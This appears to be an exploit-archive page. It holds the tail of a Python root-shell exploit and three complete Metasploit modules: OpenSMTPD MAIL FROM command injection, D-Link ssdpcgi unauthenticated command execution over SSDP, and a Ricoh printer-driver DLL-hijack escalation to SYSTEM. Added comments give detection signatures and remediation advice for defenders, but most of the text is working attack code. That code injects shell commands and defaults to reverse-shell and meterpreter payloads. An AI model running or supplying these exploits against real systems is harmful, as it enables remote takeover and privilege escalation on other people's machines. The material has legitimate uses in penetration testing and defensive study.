        print "(+) leaked vfs path: %s" % "/".join(vfspth.split("/")[10:])

        # stage 2 - get a valid session
        if we_can_login(t, pwd):
            print "(+) created a root session!"

            # stage 3 - get a root shell via cmdi
            pop_a_root_shell(t, ls, lp)

# Run the three stages only when the file is executed as a script.
if __name__ == "__main__":
    main()

OpenSMTPD MAIL FROM Remote Code Execution


This Metasploit module exploits a command injection in the MAIL FROM field during SMTP interaction with OpenSMTPD to execute code as the root user.


MD5 | 2b9fdae42ead941fa800754cf08e9965

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for CVE-2020-7247 (see 'References').
#
# Per the module description, a command injection in the MAIL FROM field of
# an SMTP session lets OpenSMTPD execute supplied shell code as root.
#
# Defender notes:
# - The exchange is otherwise an ordinary SMTP session. The tell is a
#   MAIL FROM address whose local part contains ';' and shell keywords,
#   followed by a message body that opens with lines holding only '#'.
# - #check matches the greeting banner only, so "Detected" means "OpenSMTPD
#   is answering", not "this build is vulnerable".
# - Remediation is to run an OpenSMTPD build that contains the fix for
#   CVE-2020-7247 and to keep the SMTP port closed to networks that do not
#   need to deliver mail to the host.
class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Expect

  # Registers module metadata, the RPORT/RCPT_TO options and two advanced
  # options (ForceExploit, ExpectTimeout).
  #
  # @param info [Hash] metadata merged into the defaults below
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',
      # %q body left flush-left: leading whitespace would become part of the string
      'Description' => %q{
This module exploits a command injection in the MAIL FROM field during
SMTP interaction with OpenSMTPD to execute code as the root user.
},
      'Author' => [
        'Qualys', # Discovery and PoC
        'wvu', # Module
        'RageLtMan <rageltman[at]sempervictus>' # Module
      ],
      'References' => [
        ['CVE', '2020-7247'],
        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
      ],
      'DisclosureDate' => '2020-01-28',
      'License' => MSF_LICENSE,
      'Platform' => 'unix',
      'Arch' => ARCH_CMD,
      'Privileged' => true,
      'Targets' => [
        ['OpenSMTPD >= commit a8e222352f',
          # Characters the MAIL FROM value must not contain; enforced in #exploit.
          'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
        ]
      ],
      'DefaultTarget' => 0,
      'DefaultOptions' => {'PAYLOAD' => 'cmd/unix/reverse_netcat'}
    ))

    register_options([
      Opt::RPORT(25),
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
    ])

    register_advanced_options([
      OptBool.new('ForceExploit', [false, 'Override check result', false]),
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

  # Connects, reads the greeting and classifies the service by banner alone.
  #
  # @return [CheckCode] Unknown when nothing was read or the connection
  #   failed, Detected when a line starts with 220 and mentions OpenSMTPD,
  #   Safe otherwise. The OpenSMTPD version is never examined.
  def check
    connect
    res = sock.get_once

    return CheckCode::Unknown unless res
    return CheckCode::Detected if res =~ /^220.*OpenSMTPD/

    CheckCode::Safe
  rescue EOFError, Rex::ConnectionError => e
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  # Runs the SMTP dialogue that carries the injected MAIL FROM value and the
  # payload in the message body.
  #
  # Aborts via fail_with when #check does not report Detected (unless
  # ForceExploit is set), when the MAIL FROM value exceeds 64 characters or
  # contains one of the target's MyBadChars, or on connection error/timeout.
  def exploit
    unless datastore['ForceExploit']
      unless check == CheckCode::Detected
        fail_with(Failure::Unknown, 'Set ForceExploit to override')
      end
    end

    # We don't care who we are, so randomize it
    me = rand_text_alphanumeric(8..42)

    # Send mail to this valid recipient
    to = datastore['RCPT_TO']

    # Comment "slide" courtesy of Qualys - brilliant!
    iter = rand_text_alphanumeric(15).chars.join('')
    # The sender "address" is a shell fragment rather than a mailbox.
    from = ";for #{rand_text_alpha(1)} in #{iter};do read;done;sh;exit 0;"

    # This is just insurance, since the code was already written
    if from.length > 64
      fail_with(Failure::BadConfig, 'MAIL FROM field is greater than 64 chars')
    elsif (badchars = (from.chars & target['MyBadChars'])).any?
      fail_with(Failure::BadConfig, "MAIL FROM field has badchars: #{badchars}")
    end

    # Create the mail body with comment slide and payload
    body = "\r\n" + "#\r\n" * 15 + payload.encoded

    # Ordered map of line-to-send => reply pattern to wait for. A nil key
    # sends nothing and only waits (the greeting); a nil pattern sends
    # without waiting (the body). Hash insertion order is the protocol order.
    sploit = {
      nil => /220.*OpenSMTPD/,
      "HELO #{me}" => /250.*pleased to meet you/,
      "MAIL FROM:<#{from}>" => /250.*Ok/,
      "RCPT TO:<#{to}>" => /250.*Recipient ok/,
      'DATA' => /354 Enter mail.*itself/,
      body => nil,
      '.' => /250.*Message accepted for delivery/,
      'QUIT' => /221.*Bye/
    }

    print_status('Connecting to OpenSMTPD')
    connect

    print_status('Saying hello and sending exploit')
    sploit.each do |line, pattern|
      send_expect(
        line,
        pattern,
        sock: sock,
        timeout: datastore['ExpectTimeout'],
        newline: "\r\n"
      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end

end

D-Link ssdpcgi Unauthenticated Remote Command Execution


This Metasploit module exploits an ssdpcgi remote command execution vulnerability in D-Link devices.


MD5 | 5329421503cffac0f084cba10efb1284

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Metasploit remote exploit module for CVE-2019-20215 (see 'References'):
# unauthenticated command execution through the ssdpcgi component of D-Link
# devices.
#
# Defender notes:
# - The trigger is a single SSDP M-SEARCH datagram (default UDP port 1900)
#   whose ST header contains backticks, after either "urn:device:1;" or
#   "uuid:". A legitimate search target never contains backticks, so this
#   makes a precise network signature.
# - No authentication is involved; exposure is decided purely by whether
#   SSDP on the device is reachable. Keep UPnP/SSDP off WAN-facing interfaces
#   and install vendor firmware that addresses the CVE where available.
class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  # Registers module metadata and the VECTOR option (URN or UUID) that
  # selects which form of the ST header value is used.
  #
  # @param info [Hash] metadata merged into the defaults below
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
      # %q body left flush-left: leading whitespace would become part of the string
      'Description' => %q{
D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
},
      'Author' =>
        [
          's1kr10s',
          'secenv'
        ],
      'License' => MSF_LICENSE,
      'References' =>
        [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged' => true,
      'Platform' => 'linux',
      'Arch' => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
          'PAYLOAD' => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          'RPORT' => '1900'
        },
      'Targets' =>
        [
          [ 'Auto', { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget' => 0
    ))

    register_options(
      [
        Msf::OptEnum.new('VECTOR',[true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
      ])
  end

  # Delivers the payload through the command stager, at most 1500 characters
  # per command; each command is sent by #execute_command.
  def exploit
    execute_cmdstager(linemax: 1500)
  end

  # Sends one M-SEARCH datagram whose ST header carries +cmd+ in backticks.
  #
  # @param cmd [String] command line produced by the command stager
  # @param opts [Hash] stager options; not used by this method
  def execute_command(cmd, opts)
    type = datastore['VECTOR']
    if type == "URN"
      print_status("Target Payload URN")
      val = "urn:device:1;`#{cmd}`"
    else
      print_status("Target Payload UUID")
      val = "uuid:`#{cmd}`"
    end

    connect_udp
    header = "M-SEARCH * HTTP/1.1\r\n"
    # The Host header names the SSDP multicast group as literal text.
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
    header << "ST:#{val}\r\n"
    header << "Man:\"ssdp:discover\"\r\n"
    header << "MX:2\r\n\r\n"
    # Fire-and-forget: no reply is read before the socket is closed.
    udp_sock.put(header)
    disconnect_udp
  end
end

Ricoh Driver Privilege Escalation


This Metasploit module leverages the prnmngr.vbs script to add and delete printers. Multiple runs of this module may be required given successful exploitation is time-sensitive.


MD5 | fe0a9a6351caebe61c5e0ce2e0b572ad

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

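# Metasploit local exploit module for CVE-2019-19363 (see 'References'):
# Ricoh printer drivers on Windows leave their driver directory writable by
# low-privileged users, and a SYSTEM process loads DLLs from it while a
# printer is being installed.
#
# Defender notes:
# - Audit: #check inspects icacls output for
#   C:\ProgramData\RICOH_DRV\<driver>\_common\dlz and flags it when the
#   output mentions "Everyone:" and "(F)". The same ACL audit can be run
#   fleet-wide; the fix is an updated driver or a tightened ACL on that tree.
# - Artifacts on a host where this ran: headerfooter.dll in %TEMP% and in the
#   driver's dlz directory, a randomly named .bat file in %TEMP%, cscript
#   running prnmngr.vbs with -a and port lpt1:, and a cmd.exe batch loop
#   issuing "copy /y" repeatedly.
# - The module's own description says exploitation is time-sensitive and may
#   need several runs, so repeated printer add/delete events are another
#   signal.
class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  # Registers module metadata, marks the module as needing cleanup and adds
  # the ForceExploit advanced option.
  #
  # @param info [Hash] metadata merged into the defaults below
  def initialize(info = {})
    super(update_info(info,
      'Name' => 'Ricoh Driver Privilege Escalation',
      # %q body left flush-left: leading whitespace would become part of the string
      'Description' => %q(
Various Ricoh printer drivers allow escalation of
privileges on Windows systems.

For vulnerable drivers, a low-privileged user can
read/write files within the `RICOH_DRV` directory
and its subdirectories.

`PrintIsolationHost.exe`, a Windows process running
as NT AUTHORITY\SYSTEM, loads driver-specific DLLs
during the installation of a printer. A user can
elevate to SYSTEM by writing a malicious DLL to
the vulnerable driver directory and adding a new
printer with a vulnerable driver.

This module leverages the `prnmngr.vbs` script
to add and delete printers. Multiple runs of this
module may be required given successful exploitation
is time-sensitive.
),
      'License' => MSF_LICENSE,
      'Author' => [
        'Alexander Pudwill', # discovery & PoC
        'Pentagrid AG', # PoC
        'Shelby Pace' # msf module
      ],
      'References' =>
        [
          [ 'CVE', '2019-19363'],
          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
        ],
      'Arch' => [ ARCH_X86, ARCH_X64 ],
      'Platform' => 'win',
      'Payload' =>
        {
        },
      'SessionTypes' => [ 'meterpreter' ],
      'Targets' =>
        [[
          'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] }
        ]],
      'Notes' =>
        {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability' => [ SERVICE_RESOURCE_LOSS ]
        },
      'DisclosureDate' => "Jan 22 2020",
      'DefaultTarget' => 0
    ))

    self.needs_cleanup = true

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  # Looks for a Ricoh driver directory whose ACL output mentions full control
  # for Everyone and remembers the first match in @driver_path.
  #
  # @return [CheckCode] Safe when C:\ProgramData\RICOH_DRV is absent;
  #   Detected when it exists but is empty or no dlz directory matched;
  #   Appears when a matching directory was found.
  def check
    dir_name = "C:\\ProgramData\\RICOH_DRV"

    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)
    driver_names = dir(dir_name)

    # Integer 0 is truthy in Ruby, so the previous `unless driver_names.length`
    # guard could never fire; test for an empty listing explicitly.
    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") if driver_names.empty?

    vulnerable = false
    driver_names.each do |driver_name|
      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
      next unless directory?(full_path)
      @driver_path = full_path

      res = cmd_exec("icacls \"#{@driver_path}\"")
      # NOTE(review): the two tests below are independent. "(F)" on any
      # principal's entry satisfies the second one, so the result can
      # overstate what Everyone is actually granted.
      next unless res.include?('Everyone:')
      next unless res.match(/\(F\)/)

      vulnerable = true
      break
    end

    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

    vprint_status("Vulnerable driver directory: #{@driver_path}")
    CheckCode::Appears('Ricoh driver directory has full permissions')
  end

  # Writes the payload DLL and a batch file to %TEMP%, starts prnmngr.vbs to
  # add a printer that uses +driver_name+, and runs the batch file, which
  # copies the DLL over headerfooter.dll in the driver directory in a loop.
  # Both temp files are registered for removal. Meterpreter request errors
  # are logged rather than raised.
  #
  # @param driver_name [String] name of the driver directory under RICOH_DRV
  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_data = generate_payload_dll
    dll_path = "#{@driver_path}\\headerfooter.dll"

    temp_path = expand_path('%TEMP%\\headerfooter.dll')
    vprint_status("Writing dll to #{temp_path}")

    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
    # The batch file repeats the copy for as long as it succeeds.
    bat_file = <<~HEREDOC
      :repeat
      #{cp_cmd} && goto :repeat
    HEREDOC

    write_file(bat_file_path, bat_file)
    write_file(temp_path, dll_data)
    register_files_for_cleanup(bat_file_path, temp_path)

    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""
    print_status("Adding printer #{@printer_name}...")
    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
    vprint_status("Executing script...")
    cmd_exec(bat_cmd)
  rescue Rex::Post::Meterpreter::RequestError => e
    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  end

  # Entry point: verifies preconditions, runs #check, derives the driver name
  # from @driver_path and calls #add_printer.
  #
  # Aborts via fail_with when the session is already SYSTEM, is not a
  # Meterpreter session, when payload and host architectures differ, or when
  # #check does not return Appears and ForceExploit is not set.
  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?

    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
    end

    @driver_path = ''
    unless check == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"
    # The driver name is the path component that follows RICOH_DRV.
    drvr_name = @driver_path.split('\\')
    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
    drvr_name = drvr_name[drvr_name_idx]

    add_printer(drvr_name)
  end

  # Deletes the printer added by #add_printer by running prnmngr.vbs with -d
  # after a three-second pause. The DLL copied into the driver directory is
  # not removed here.
  def cleanup
    print_status("Deleting printer #{@printer_name}")
    Rex.sleep(3)
    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
  end
end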

macOS/iOS ImageIO DDS Image Out-Of-Bounds Read
